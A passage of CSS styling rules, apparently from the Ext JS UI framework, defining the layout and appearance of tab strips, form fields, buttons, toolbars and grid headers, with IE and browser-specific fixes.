.x-tab-strip-bottom .x-tab-right {
background: no-repeat bottom right;
}
.x-tab-strip-bottom .x-tab-left {
background: no-repeat bottom left;
}
.x-tab-strip-bottom .x-tab-strip-active .x-tab-right {
background: no-repeat bottom right;
}
.x-tab-strip-bottom .x-tab-strip-active .x-tab-left {
background: no-repeat bottom left;
}
.x-tab-strip-bottom .x-tab-left {
margin-right: 3px;
padding:0 10px;
}
.x-tab-strip-bottom .x-tab-right {
padding:0;
}
.x-tab-strip .x-tab-strip-close {
display:none;
}
.x-tab-strip-closable {
position:relative;
}
.x-tab-strip-closable .x-tab-left {
padding-right:19px;
}
.x-tab-strip .x-tab-strip-closable a.x-tab-strip-close {
opacity:.6;
-moz-opacity:.6;
background-repeat:no-repeat;
display:block;
width:11px;
height:11px;
position:absolute;
top:3px;
right:3px;
cursor:pointer;
z-index:2;
}
.x-tab-strip .x-tab-strip-active a.x-tab-strip-close {
opacity:.8;
-moz-opacity:.8;
}
.x-tab-strip .x-tab-strip-closable a.x-tab-strip-close:hover{
opacity:1;
-moz-opacity:1;
}
.x-tab-panel-body {
border: 1px solid;
}
.x-tab-panel-body-top {
border-top: 0 none;
}
.x-tab-panel-body-bottom {
border-bottom: 0 none;
}
.x-tab-scroller-left {
background: transparent no-repeat -18px 0;
border-bottom: 1px solid;
width:18px;
position:absolute;
left:0;
top:0;
z-index:10;
cursor:pointer;
}
.x-tab-scroller-left-over {
background-position: 0 0;
}
.x-tab-scroller-left-disabled {
background-position: -18px 0;
opacity:.5;
-moz-opacity:.5;
filter:alpha(opacity=50);
cursor:default;
}
.x-tab-scroller-right {
background: transparent no-repeat 0 0;
border-bottom: 1px solid;
width:18px;
position:absolute;
right:0;
top:0;
z-index:10;
cursor:pointer;
}
.x-tab-scroller-right-over {
background-position: -18px 0;
}
.x-tab-scroller-right-disabled {
background-position: 0 0;
opacity:.5;
-moz-opacity:.5;
filter:alpha(opacity=50);
cursor:default;
}
.x-tab-scrolling-bottom .x-tab-scroller-left, .x-tab-scrolling-bottom .x-tab-scroller-right{
margin-top: 1px;
}
.x-tab-scrolling .x-tab-strip-wrap {
margin-left:18px;
margin-right:18px;
}
.x-tab-scrolling {
position:relative;
}
.x-tab-panel-bbar .x-toolbar {
border:1px solid;
border-top:0 none;
overflow:hidden;
padding:2px;
}
.x-tab-panel-tbar .x-toolbar {
border:1px solid;
border-top:0 none;
overflow:hidden;
padding:2px;
}/* all fields */
.x-form-field{
margin: 0 0 0 0;
}
.ext-webkit *:focus{
outline: none !important;
}
/* ---- text fields ---- */
.x-form-text, textarea.x-form-field{
padding:1px 3px;
background:repeat-x 0 0;
border:1px solid;
}
textarea.x-form-field {
padding:2px 3px;
}
.x-form-text, .ext-ie .x-form-file {
height:22px;
line-height:18px;
vertical-align:middle;
}
.ext-ie6 .x-form-text, .ext-ie7 .x-form-text {
margin:-1px 0; /* ie bogus margin bug */
height:22px; /* ie quirks */
line-height:18px;
}
.ext-ie6 .x-form-field-wrap .x-form-file-btn, .ext-ie7 .x-form-field-wrap .x-form-file-btn {
top: -1px; /* because of all these margin hacks, these buttons are off by one pixel in IE6,7 */
}
.ext-ie6 textarea.x-form-field, .ext-ie7 textarea.x-form-field {
margin:-1px 0; /* ie bogus margin bug */
}
.ext-strict .x-form-text {
height:18px;
}
.ext-safari.ext-mac textarea.x-form-field {
margin-bottom:-2px; /* another bogus margin bug, safari/mac only */
}
/*
.ext-strict .ext-ie8 .x-form-text, .ext-strict .ext-ie8 textarea.x-form-field {
margin-bottom: 1px;
}
*/
.ext-gecko .x-form-text , .ext-ie8 .x-form-text {
padding-top:2px; /* FF won't center the text vertically */
padding-bottom:0;
}
.ext-ie6 .x-form-composite .x-form-text.x-box-item, .ext-ie7 .x-form-composite .x-form-text.x-box-item {
margin: 0 !important; /* clear ie bogus margin bug fix */
}
textarea {
resize: none; /* Disable browser resizable textarea */
}
/* select boxes */
.x-form-select-one {
height:20px;
line-height:18px;
vertical-align:middle;
border: 1px solid;
}
/* multi select boxes */
/* --- TODO --- */
/* 2.0.2 style */
.x-form-check-wrap {
line-height:18px;
height: auto;
}
.ext-ie .x-form-check-wrap input {
width:15px;
height:15px;
}
.x-form-check-wrap input{
vertical-align: bottom;
}
.x-editor .x-form-check-wrap {
padding:3px;
}
.x-editor .x-form-checkbox {
height:13px;
}
.x-form-check-group-label {
border-bottom: 1px solid;
margin-bottom: 5px;
padding-left: 3px !important;
float: none !important;
}
/* wrapped fields and triggers */
.x-form-field-wrap .x-form-trigger{
width:17px;
height:21px;
border:0;
background:transparent no-repeat 0 0;
cursor:pointer;
border-bottom: 1px solid;
position:absolute;
top:0;
}
.x-form-field-wrap .x-form-date-trigger, .x-form-field-wrap .x-form-clear-trigger, .x-form-field-wrap .x-form-search-trigger{
cursor:pointer;
}
.x-form-field-wrap .x-form-twin-triggers .x-form-trigger{
position:static;
top:auto;
vertical-align:top;
}
.x-form-field-wrap {
position:relative;
left:0;top:0;
text-align: left;
zoom:1;
white-space: nowrap;
}
.ext-strict .ext-ie8 .x-toolbar-cell .x-form-field-trigger-wrap .x-form-trigger {
right: 0; /* IE8 Strict mode trigger bug */
}
.x-form-field-wrap .x-form-trigger-over{
background-position:-17px 0;
}
.x-form-field-wrap .x-form-trigger-click{
background-position:-34px 0;
}
.x-trigger-wrap-focus .x-form-trigger{
background-position:-51px 0;
}
.x-trigger-wrap-focus .x-form-trigger-over{
background-position:-68px 0;
}
.x-trigger-wrap-focus .x-form-trigger-click{
background-position:-85px 0;
}
.x-trigger-wrap-focus .x-form-trigger{
border-bottom: 1px solid;
}
.x-item-disabled .x-form-trigger-over{
background-position:0 0 !important;
border-bottom: 1px solid;
}
.x-item-disabled .x-form-trigger-click{
background-position:0 0 !important;
border-bottom: 1px solid;
}
.x-trigger-noedit{
cursor:pointer;
}
/* field focus style */
.x-form-focus, textarea.x-form-focus{
border: 1px solid;
}
/* invalid fields */
.x-form-invalid, textarea.x-form-invalid{
background:repeat-x bottom;
border: 1px solid;
}
.x-form-inner-invalid, textarea.x-form-inner-invalid{
background:repeat-x bottom;
}
/* editors */
.x-editor {
visibility:hidden;
padding:0;
margin:0;
}
.x-form-grow-sizer {
left: -10000px;
padding: 8px 3px;
position: absolute;
visibility:hidden;
top: -10000px;
white-space: pre-wrap;
white-space: -moz-pre-wrap;
white-space: -pre-wrap;
white-space: -o-pre-wrap;
word-wrap: break-word;
zoom:1;
}
.x-form-grow-sizer p {
margin:0 !important;
border:0 none !important;
padding:0 !important;
}
/* Form Items CSS */
.x-form-item {
display:block;
margin-bottom:4px;
zoom:1;
}
.x-form-item label.x-form-item-label {
display:block;
float:left;
width:100px;
padding:3px;
padding-left:0;
clear:left;
z-index:2;
position:relative;
}
.x-form-element {
padding-left:105px;
position:relative;
}
.x-form-invalid-msg {
padding:2px;
padding-left:18px;
background: transparent no-repeat 0 2px;
line-height:16px;
width:200px;
}
.x-form-label-left label.x-form-item-label {
text-align:left;
}
.x-form-label-right label.x-form-item-label {
text-align:right;
}
.x-form-label-top .x-form-item label.x-form-item-label {
width:auto;
float:none;
clear:none;
display:inline;
margin-bottom:4px;
position:static;
}
.x-form-label-top .x-form-element {
padding-left:0;
padding-top:4px;
}
.x-form-label-top .x-form-item {
padding-bottom:4px;
}
/* Editor small font for grid, toolbar and tree */
.x-small-editor .x-form-text {
height:20px;
line-height:16px;
vertical-align:middle;
}
.ext-ie6 .x-small-editor .x-form-text, .ext-ie7 .x-small-editor .x-form-text {
margin-top:-1px !important; /* ie bogus margin bug */
margin-bottom:-1px !important;
height:20px !important; /* ie quirks */
line-height:16px !important;
}
.ext-strict .x-small-editor .x-form-text {
height:16px !important;
}
.ext-ie6 .x-small-editor .x-form-text, .ext-ie7 .x-small-editor .x-form-text {
height:20px;
line-height:16px;
}
.ext-border-box .x-small-editor .x-form-text {
height:20px;
}
.x-small-editor .x-form-select-one {
height:20px;
line-height:16px;
vertical-align:middle;
}
.x-small-editor .x-form-num-field {
text-align:right;
}
.x-small-editor .x-form-field-wrap .x-form-trigger{
height:19px;
}
.ext-webkit .x-small-editor .x-form-text{padding-top:3px;font-size:100%;}
.x-form-clear {
clear:both;
height:0;
overflow:hidden;
line-height:0;
font-size:0;
}
.x-form-clear-left {
clear:left;
height:0;
overflow:hidden;
line-height:0;
font-size:0;
}
.ext-ie6 .x-form-check-wrap input, .ext-border-box .x-form-check-wrap input{
margin-top: 3px;
}
.x-form-cb-label {
position: relative;
margin-left:4px;
top: 2px;
}
.ext-ie .x-form-cb-label{
top: 1px;
}
.ext-ie6 .x-form-cb-label, .ext-border-box .x-form-cb-label{
top: 3px;
}
.x-form-display-field{
padding-top: 2px;
}
.ext-gecko .x-form-display-field, .ext-strict .ext-ie7 .x-form-display-field{
padding-top: 1px;
}
.ext-ie .x-form-display-field{
padding-top: 3px;
}
.ext-strict .ext-ie8 .x-form-display-field{
padding-top: 0;
}
.x-form-column {
float:left;
padding:0;
margin:0;
width:48%;
overflow:hidden;
zoom:1;
}
/* buttons */
.x-form .x-form-btns-ct .x-btn{
float:right;
clear:none;
}
.x-form .x-form-btns-ct .x-form-btns td {
border:0;
padding:0;
}
.x-form .x-form-btns-ct .x-form-btns-right table{
float:right;
clear:none;
}
.x-form .x-form-btns-ct .x-form-btns-left table{
float:left;
clear:none;
}
.x-form .x-form-btns-ct .x-form-btns-center{
text-align:center; /*ie*/
}
.x-form .x-form-btns-ct .x-form-btns-center table{
margin:0 auto; /*everyone else*/
}
.x-form .x-form-btns-ct table td.x-form-btn-td{
padding:3px;
}
.x-form .x-form-btns-ct .x-btn-focus .x-btn-left{
background-position:0 -147px;
}
.x-form .x-form-btns-ct .x-btn-focus .x-btn-right{
background-position:0 -168px;
}
.x-form .x-form-btns-ct .x-btn-focus .x-btn-center{
background-position:0 -189px;
}
.x-form .x-form-btns-ct .x-btn-click .x-btn-center{
background-position:0 -126px;
}
.x-form .x-form-btns-ct .x-btn-click .x-btn-right{
background-position:0 -84px;
}
.x-form .x-form-btns-ct .x-btn-click .x-btn-left{
background-position:0 -63px;
}
.x-form-invalid-icon {
width:16px;
height:18px;
visibility:hidden;
position:absolute;
left:0;
top:0;
display:block;
background:transparent no-repeat 0 2px;
}
/* fieldsets */
.x-fieldset {
border:1px solid;
padding:10px;
margin-bottom:10px;
display:block; /* preserve margins in IE */
}
/* make top of checkbox/tools visible in webkit */
.ext-webkit .x-fieldset-header {
padding-top: 1px;
}
.ext-ie .x-fieldset legend {
margin-bottom:10px;
}
.ext-ie .x-fieldset {
padding-top: 0;
padding-bottom:10px;
}
.x-fieldset legend .x-tool-toggle {
margin-right:3px;
margin-left:0;
float:left !important;
}
.x-fieldset legend input {
margin-right:3px;
float:left !important;
height:13px;
width:13px;
}
fieldset.x-panel-collapsed {
padding-bottom:0 !important;
border-width: 1px 1px 0 1px !important;
border-left-color: transparent;
border-right-color: transparent;
}
.ext-ie6 fieldset.x-panel-collapsed{
padding-bottom:0 !important;
border-width: 1px 0 0 0 !important;
margin-left: 1px;
margin-right: 1px;
}
fieldset.x-panel-collapsed .x-fieldset-bwrap {
visibility:hidden;
position:absolute;
left:-1000px;
top:-1000px;
}
.ext-ie .x-fieldset-bwrap {
zoom:1;
}
.x-fieldset-noborder {
border:0px none transparent;
}
.x-fieldset-noborder legend {
margin-left:-3px;
}
/* IE legend positioning bug */
.ext-ie .x-fieldset-noborder legend {
position: relative;
margin-bottom:23px;
}
.ext-ie .x-fieldset-noborder legend span {
position: absolute;
left:16px;
}
.ext-gecko .x-window-body .x-form-item {
-moz-outline: none;
outline: none;
overflow: auto;
}
.ext-mac.ext-gecko .x-window-body .x-form-item {
overflow:hidden;
}
.ext-gecko .x-form-item {
-moz-outline: none;
outline: none;
}
.x-hide-label label.x-form-item-label {
display:none;
}
.x-hide-label .x-form-element {
padding-left: 0 !important;
}
.x-form-label-top .x-hide-label label.x-form-item-label{
display: none;
}
.x-fieldset {
overflow:hidden;
}
.x-fieldset-bwrap {
overflow:hidden;
zoom:1;
}
.x-fieldset-body {
overflow:hidden;
}
.x-btn{
cursor:pointer;
white-space: nowrap;
}
.x-btn button{
border:0 none;
background-color:transparent;
padding-left:3px;
padding-right:3px;
cursor:pointer;
margin:0;
overflow:visible;
width:auto;
-moz-outline:0 none;
outline:0 none;
}
* html .ext-ie .x-btn button {
width:1px;
}
.ext-gecko .x-btn button, .ext-webkit .x-btn button {
padding-left:0;
padding-right:0;
}
.ext-gecko .x-btn button::-moz-focus-inner {
padding:0;
}
.ext-ie .x-btn button {
padding-top:2px;
}
.x-btn td {
padding:0 !important;
}
.x-btn-text {
cursor:pointer;
white-space: nowrap;
padding:0;
}
/* icon placement and sizing styles */
/* Only text */
.x-btn-noicon .x-btn-small .x-btn-text{
height: 16px;
}
.x-btn-noicon .x-btn-medium .x-btn-text{
height: 24px;
}
.x-btn-noicon .x-btn-large .x-btn-text{
height: 32px;
}
/* Only icons */
.x-btn-icon .x-btn-text{
background-position: center;
background-repeat: no-repeat;
}
.x-btn-icon .x-btn-small .x-btn-text{
height: 16px;
width: 16px;
}
.x-btn-icon .x-btn-medium .x-btn-text{
height: 24px;
width: 24px;
}
.x-btn-icon .x-btn-large .x-btn-text{
height: 32px;
width: 32px;
}
/* Icons and text */
/* left */
.x-btn-text-icon .x-btn-icon-small-left .x-btn-text{
background-position: 0 center;
background-repeat: no-repeat;
padding-left:18px;
height:16px;
}
.x-btn-text-icon .x-btn-icon-medium-left .x-btn-text{
background-position: 0 center;
background-repeat: no-repeat;
padding-left:26px;
height:24px;
}
.x-btn-text-icon .x-btn-icon-large-left .x-btn-text{
background-position: 0 center;
background-repeat: no-repeat;
padding-left:34px;
height:32px;
}
/* top */
.x-btn-text-icon .x-btn-icon-small-top .x-btn-text{
background-position: center 0;
background-repeat: no-repeat;
padding-top:18px;
}
.x-btn-text-icon .x-btn-icon-medium-top .x-btn-text{
background-position: center 0;
background-repeat: no-repeat;
padding-top:26px;
}
.x-btn-text-icon .x-btn-icon-large-top .x-btn-text{
background-position: center 0;
background-repeat: no-repeat;
padding-top:34px;
}
/* right */
.x-btn-text-icon .x-btn-icon-small-right .x-btn-text{
background-position: right center;
background-repeat: no-repeat;
padding-right:18px;
height:16px;
}
.x-btn-text-icon .x-btn-icon-medium-right .x-btn-text{
background-position: right center;
background-repeat: no-repeat;
padding-right:26px;
height:24px;
}
.x-btn-text-icon .x-btn-icon-large-right .x-btn-text{
background-position: right center;
background-repeat: no-repeat;
padding-right:34px;
height:32px;
}
/* bottom */
.x-btn-text-icon .x-btn-icon-small-bottom .x-btn-text{
background-position: center bottom;
background-repeat: no-repeat;
padding-bottom:18px;
}
.x-btn-text-icon .x-btn-icon-medium-bottom .x-btn-text{
background-position: center bottom;
background-repeat: no-repeat;
padding-bottom:26px;
}
.x-btn-text-icon .x-btn-icon-large-bottom .x-btn-text{
background-position: center bottom;
background-repeat: no-repeat;
padding-bottom:34px;
}
/* background positioning */
.x-btn-tr i, .x-btn-tl i, .x-btn-mr i, .x-btn-ml i, .x-btn-br i, .x-btn-bl i{
font-size:1px;
line-height:1px;
width:3px;
display:block;
overflow:hidden;
}
.x-btn-tr i, .x-btn-tl i, .x-btn-br i, .x-btn-bl i{
height:3px;
}
.x-btn-tl{
width:3px;
height:3px;
background:no-repeat 0 0;
}
.x-btn-tr{
width:3px;
height:3px;
background:no-repeat -3px 0;
}
.x-btn-tc{
height:3px;
background:repeat-x 0 -6px;
}
.x-btn-ml{
width:3px;
background:no-repeat 0 -24px;
}
.x-btn-mr{
width:3px;
background:no-repeat -3px -24px;
}
.x-btn-mc{
background:repeat-x 0 -1096px;
vertical-align: middle;
text-align:center;
padding:0 5px;
cursor:pointer;
white-space:nowrap;
}
/* Fixes an issue with the button height */
.ext-strict .ext-ie6 .x-btn-mc, .ext-strict .ext-ie7 .x-btn-mc {
height: 100%;
}
.x-btn-bl{
width:3px;
height:3px;
background:no-repeat 0 -3px;
}
.x-btn-br{
width:3px;
height:3px;
background:no-repeat -3px -3px;
}
.x-btn-bc{
height:3px;
background:repeat-x 0 -15px;
}
.x-btn-over .x-btn-tl{
background-position: -6px 0;
}
.x-btn-over .x-btn-tr{
background-position: -9px 0;
}
.x-btn-over .x-btn-tc{
background-position: 0 -9px;
}
.x-btn-over .x-btn-ml{
background-position: -6px -24px;
}
.x-btn-over .x-btn-mr{
background-position: -9px -24px;
}
.x-btn-over .x-btn-mc{
background-position: 0 -2168px;
}
.x-btn-over .x-btn-bl{
background-position: -6px -3px;
}
.x-btn-over .x-btn-br{
background-position: -9px -3px;
}
.x-btn-over .x-btn-bc{
background-position: 0 -18px;
}
.x-btn-click .x-btn-tl, .x-btn-menu-active .x-btn-tl, .x-btn-pressed .x-btn-tl{
background-position: -12px 0;
}
.x-btn-click .x-btn-tr, .x-btn-menu-active .x-btn-tr, .x-btn-pressed .x-btn-tr{
background-position: -15px 0;
}
.x-btn-click .x-btn-tc, .x-btn-menu-active .x-btn-tc, .x-btn-pressed .x-btn-tc{
background-position: 0 -12px;
}
.x-btn-click .x-btn-ml, .x-btn-menu-active .x-btn-ml, .x-btn-pressed .x-btn-ml{
background-position: -12px -24px;
}
.x-btn-click .x-btn-mr, .x-btn-menu-active .x-btn-mr, .x-btn-pressed .x-btn-mr{
background-position: -15px -24px;
}
.x-btn-click .x-btn-mc, .x-btn-menu-active .x-btn-mc, .x-btn-pressed .x-btn-mc{
background-position: 0 -3240px;
}
.x-btn-click .x-btn-bl, .x-btn-menu-active .x-btn-bl, .x-btn-pressed .x-btn-bl{
background-position: -12px -3px;
}
.x-btn-click .x-btn-br, .x-btn-menu-active .x-btn-br, .x-btn-pressed .x-btn-br{
background-position: -15px -3px;
}
.x-btn-click .x-btn-bc, .x-btn-menu-active .x-btn-bc, .x-btn-pressed .x-btn-bc{
background-position: 0 -21px;
}
.x-btn-disabled *{
cursor:default !important;
}
/* With a menu arrow */
/* right */
.x-btn-mc em.x-btn-arrow {
display:block;
background:transparent no-repeat right center;
padding-right:10px;
}
.x-btn-mc em.x-btn-split {
display:block;
background:transparent no-repeat right center;
padding-right:14px;
}
/* bottom */
.x-btn-mc em.x-btn-arrow-bottom {
display:block;
background:transparent no-repeat center bottom;
padding-bottom:14px;
}
.x-btn-mc em.x-btn-split-bottom {
display:block;
background:transparent no-repeat center bottom;
padding-bottom:14px;
}
/* height adjustment class */
.x-btn-as-arrow .x-btn-mc em {
display:block;
background-color:transparent;
padding-bottom:14px;
}
/* groups */
.x-btn-group {
padding:1px;
}
.x-btn-group-header {
padding:2px;
text-align:center;
}
.x-btn-group-tc {
background: transparent repeat-x 0 0;
overflow:hidden;
}
.x-btn-group-tl {
background: transparent no-repeat 0 0;
padding-left:3px;
zoom:1;
}
.x-btn-group-tr {
background: transparent no-repeat right 0;
zoom:1;
padding-right:3px;
}
.x-btn-group-bc {
background: transparent repeat-x 0 bottom;
zoom:1;
}
.x-btn-group-bc .x-panel-footer {
zoom:1;
}
.x-btn-group-bl {
background: transparent no-repeat 0 bottom;
padding-left:3px;
zoom:1;
}
.x-btn-group-br {
background: transparent no-repeat right bottom;
padding-right:3px;
zoom:1;
}
.x-btn-group-mc {
border:0 none;
padding:1px 0 0 0;
margin:0;
}
.x-btn-group-mc .x-btn-group-body {
background-color:transparent;
border: 0 none;
}
.x-btn-group-ml {
background: transparent repeat-y 0 0;
padding-left:3px;
zoom:1;
}
.x-btn-group-mr {
background: transparent repeat-y right 0;
padding-right:3px;
zoom:1;
}
.x-btn-group-bc .x-btn-group-footer {
padding-bottom:6px;
}
.x-panel-nofooter .x-btn-group-bc {
height:3px;
font-size:0;
line-height:0;
}
.x-btn-group-bwrap {
overflow:hidden;
zoom:1;
}
.x-btn-group-body {
overflow:hidden;
zoom:1;
}
.x-btn-group-notitle .x-btn-group-tc {
background: transparent repeat-x 0 0;
overflow:hidden;
height:2px;
}.x-toolbar{
border-style:solid;
border-width:0 0 1px 0;
display: block;
padding:2px;
background:repeat-x top left;
position:relative;
left:0;
top:0;
zoom:1;
overflow:hidden;
}
.x-toolbar-left {
width: 100%;
}
.x-toolbar .x-item-disabled .x-btn-icon {
opacity: .35;
-moz-opacity: .35;
filter: alpha(opacity=35);
}
.x-toolbar td {
vertical-align:middle;
}
.x-toolbar td,.x-toolbar span,.x-toolbar input,.x-toolbar div,.x-toolbar select,.x-toolbar label{
white-space: nowrap;
}
.x-toolbar .x-item-disabled {
cursor:default;
opacity:.6;
-moz-opacity:.6;
filter:alpha(opacity=60);
}
.x-toolbar .x-item-disabled * {
cursor:default;
}
.x-toolbar .x-toolbar-cell {
vertical-align:middle;
}
.x-toolbar .x-btn-tl, .x-toolbar .x-btn-tr, .x-toolbar .x-btn-tc, .x-toolbar .x-btn-ml, .x-toolbar .x-btn-mr,
.x-toolbar .x-btn-mc, .x-toolbar .x-btn-bl, .x-toolbar .x-btn-br, .x-toolbar .x-btn-bc
{
background-position: 500px 500px;
}
/* These rules are duplicated from button.css to give priority of x-toolbar rules above */
.x-toolbar .x-btn-over .x-btn-tl{
background-position: -6px 0;
}
.x-toolbar .x-btn-over .x-btn-tr{
background-position: -9px 0;
}
.x-toolbar .x-btn-over .x-btn-tc{
background-position: 0 -9px;
}
.x-toolbar .x-btn-over .x-btn-ml{
background-position: -6px -24px;
}
.x-toolbar .x-btn-over .x-btn-mr{
background-position: -9px -24px;
}
.x-toolbar .x-btn-over .x-btn-mc{
background-position: 0 -2168px;
}
.x-toolbar .x-btn-over .x-btn-bl{
background-position: -6px -3px;
}
.x-toolbar .x-btn-over .x-btn-br{
background-position: -9px -3px;
}
.x-toolbar .x-btn-over .x-btn-bc{
background-position: 0 -18px;
}
.x-toolbar .x-btn-click .x-btn-tl, .x-toolbar .x-btn-menu-active .x-btn-tl, .x-toolbar .x-btn-pressed .x-btn-tl{
background-position: -12px 0;
}
.x-toolbar .x-btn-click .x-btn-tr, .x-toolbar .x-btn-menu-active .x-btn-tr, .x-toolbar .x-btn-pressed .x-btn-tr{
background-position: -15px 0;
}
.x-toolbar .x-btn-click .x-btn-tc, .x-toolbar .x-btn-menu-active .x-btn-tc, .x-toolbar .x-btn-pressed .x-btn-tc{
background-position: 0 -12px;
}
.x-toolbar .x-btn-click .x-btn-ml, .x-toolbar .x-btn-menu-active .x-btn-ml, .x-toolbar .x-btn-pressed .x-btn-ml{
background-position: -12px -24px;
}
.x-toolbar .x-btn-click .x-btn-mr, .x-toolbar .x-btn-menu-active .x-btn-mr, .x-toolbar .x-btn-pressed .x-btn-mr{
background-position: -15px -24px;
}
.x-toolbar .x-btn-click .x-btn-mc, .x-toolbar .x-btn-menu-active .x-btn-mc, .x-toolbar .x-btn-pressed .x-btn-mc{
background-position: 0 -3240px;
}
.x-toolbar .x-btn-click .x-btn-bl, .x-toolbar .x-btn-menu-active .x-btn-bl, .x-toolbar .x-btn-pressed .x-btn-bl{
background-position: -12px -3px;
}
.x-toolbar .x-btn-click .x-btn-br, .x-toolbar .x-btn-menu-active .x-btn-br, .x-toolbar .x-btn-pressed .x-btn-br{
background-position: -15px -3px;
}
.x-toolbar .x-btn-click .x-btn-bc, .x-toolbar .x-btn-menu-active .x-btn-bc, .x-toolbar .x-btn-pressed .x-btn-bc{
background-position: 0 -21px;
}
.x-toolbar div.xtb-text{
padding:2px 2px 0;
line-height:16px;
display:block;
}
.x-toolbar .xtb-sep {
background-position: center;
background-repeat: no-repeat;
display: block;
font-size: 1px;
height: 16px;
width:4px;
overflow: hidden;
cursor:default;
margin: 0 2px 0;
border:0;
}
.x-toolbar .xtb-spacer {
width:2px;
}
/* Paging Toolbar */
.x-tbar-page-number{
width:30px;
height:14px;
}
.ext-ie .x-tbar-page-number{
margin-top: 2px;
}
.x-paging-info {
position:absolute;
top:5px;
right: 8px;
}
/* floating */
.x-toolbar-ct {
width:100%;
}
.x-toolbar-right td {
text-align: center;
}
.x-panel-tbar, .x-panel-bbar, .x-window-tbar, .x-window-bbar, .x-tab-panel-tbar, .x-tab-panel-bbar, .x-plain-tbar, .x-plain-bbar {
overflow:hidden;
zoom:1;
}
.x-toolbar-more .x-btn-small .x-btn-text{
height: 16px;
width: 12px;
}
.x-toolbar-more em.x-btn-arrow {
display:inline;
background-color:transparent;
padding-right:0;
}
.x-toolbar-more .x-btn-mc em.x-btn-arrow {
background-image: none;
}
div.x-toolbar-no-items {
color:gray !important;
padding:5px 10px !important;
}
/* fix ie toolbar form items */
.ext-border-box .x-toolbar-cell .x-form-text {
margin-bottom:-1px !important;
}
.ext-border-box .x-toolbar-cell .x-form-field-wrap .x-form-text {
margin:0 !important;
}
.ext-ie .x-toolbar-cell .x-form-field-wrap {
height:21px;
}
.ext-ie .x-toolbar-cell .x-form-text {
position:relative;
top:-1px;
}
.ext-strict .ext-ie8 .x-toolbar-cell .x-form-field-trigger-wrap .x-form-text, .ext-strict .ext-ie .x-toolbar-cell .x-form-text {
top: 0px;
}
.x-toolbar-right td .x-form-field-trigger-wrap{
text-align: left;
}
.x-toolbar-cell .x-form-checkbox, .x-toolbar-cell .x-form-radio{
margin-top: 5px;
}
.x-toolbar-cell .x-form-cb-label{
vertical-align: bottom;
top: 1px;
}
.ext-ie .x-toolbar-cell .x-form-checkbox, .ext-ie .x-toolbar-cell .x-form-radio{
margin-top: 4px;
}
.ext-ie .x-toolbar-cell .x-form-cb-label{
top: 0;
}
/* Grid3 styles */
.x-grid3 {
position:relative;
overflow:hidden;
}
.x-grid-panel .x-panel-body {
overflow:hidden !important;
}
.x-grid-panel .x-panel-mc .x-panel-body {
border:1px solid;
}
.x-grid3 table {
table-layout:fixed;
}
.x-grid3-viewport{
overflow:hidden;
}
.x-grid3-hd-row td, .x-grid3-row td, .x-grid3-summary-row td{
-moz-outline: none;
outline: none;
-moz-user-focus: normal;
}
.x-grid3-row td, .x-grid3-summary-row td {
line-height:13px;
vertical-align: top;
padding-left:1px;
padding-right:1px;
-moz-user-select: auto;
-khtml-user-select: auto;
-webkit-user-select: auto;
}
.x-grid3-cell{
-moz-user-select: auto;
-khtml-user-select: auto;
-webkit-user-select: auto;
}
.x-grid3-hd-row td {
line-height:15px;
vertical-align:middle;
border-left:1px solid;
border-right:1px solid;
}
.x-grid3-hd-row .x-grid3-marker-hd {
padding:3px;
}
.x-grid3-row .x-grid3-marker {
padding:3px;
}
.x-grid3-cell-inner, .x-grid3-hd-inner{
overflow:hidden;
-o-text-overflow: ellipsis;
text-overflow: ellipsis;
padding:3px 3px 3px 5px;
white-space: nowrap;
}
/* ActionColumn, reduce padding to accommodate 16x16 icons in normal row height */
.x-action-col-cell .x-grid3-cell-inner {
padding-top: 1px;
padding-bottom: 1px;
}
.x-action-col-icon {
cursor: pointer;
}
.x-grid3-hd-inner {
position:relative;
cursor:inherit;
padding:4px 3px 4px 5px;
}
.x-grid3-row-body {
white-space:normal;
}
.x-grid3-body-cell {
-moz-outline:0 none;
outline:0 none;
}
/* IE Quirks to clip */
.ext-ie .x-grid3-cell-inner, .ext-ie .x-grid3-hd-inner{
width:100%;
}
/* reverse above in strict mode */
.ext-strict .x-grid3-cell-inner, .ext-strict .x-grid3-hd-inner{
width:auto;
}
.x-grid-row-loading {
background: no-repeat center center;
}
.x-grid-page {
overflow:hidden;
}
.x-grid3-row {
cursor: default;
border: 1px solid;
width:100%;
}
.x-grid3-row-over {
border:1px solid;
background: repeat-x left top;
}
.x-grid3-resize-proxy {
width:1px;
left:0;
cursor: e-resize;
cursor: col-resize;
position:absolute;
top:0;
height:100px;
overflow:hidden;
visibility:hidden;
border:0 none;
z-index:7;
}
.x-grid3-resize-marker {
width:1px;
left:0;
position:absolute;
top:0;
height:100px;
overflow:hidden;
visibility:hidden;
border:0 none;
z-index:7;
}
.x-grid3-focus {
position:absolute;
left:0;
top:0;
width:1px;
height:1px;
line-height:1px;
font-size:1px;
-moz-outline:0 none;
outline:0 none;
-moz-user-select: text;
-khtml-user-select: text;
-webkit-user-select:ignore;
}
/* header styles */
.x-grid3-header{
background: repeat-x 0 bottom;
cursor:default;
zoom:1;
padding:1px 0 0 0;
}
.x-grid3-header-pop {
border-left:1px solid;
float:right;
clear:none;
}
.x-grid3-header-pop-inner {
border-left:1px solid;
width:14px;
height:19px;
background: transparent no-repeat center center;
}
.ext-ie .x-grid3-header-pop-inner {
width:15px;
}
.ext-strict .x-grid3-header-pop-inner {
width:14px;
}
.x-grid3-header-inner {
overflow:hidden;
zoom:1;
float:left;
}
.x-grid3-header-offset {
padding-left:1px;
text-align: left;
}
td.x-grid3-hd-over, td.sort-desc, td.sort-asc, td.x-grid3-hd-menu-open {
border-left:1px solid;
border-right:1px solid;
}
td.x-grid3-hd-over .x-grid3-hd-inner, td.sort-desc .x-grid3-hd-inner, td.sort-asc .x-grid3-hd-inner, td.x-grid3-hd-menu-open .x-grid3-hd-inner {
background: repeat-x left bottom;
}
.x-grid3-sort-icon{
background-repeat: no-repeat;
display: none;
height: 4px;
width: 13px;
margin-left:3px;
vertical-align: middle;
}
.sort-asc .x-grid3-sort-icon, .sort-desc .x-grid3-sort-icon {
display: inline;
}
/* Header position fixes for IE strict mode */
.ext-strict .ext-ie .x-grid3-header-inner, .ext-strict .ext-ie6 .x-grid3-hd {
position:relative;
}
.ext-strict .ext-ie6 .x-grid3-hd-inner{
position:static;
}
/* Body Styles */
.x-grid3-body {
zoom:1;
}
.x-grid3-scroller {
overflow:auto;
zoom:1;
position:relative;
}
.x-grid3-cell-text, .x-grid3-hd-text {
display: block;
padding: 3px 5px 3px 5px;
-moz-user-select: none;
-khtml-user-select: none;
-webkit-user-select:ignore;
}
.x-grid3-split {
background-position: center;
background-repeat: no-repeat;
cursor: e-resize;
cursor: col-resize;
display: block;
font-size: 1px;
height: 16px;
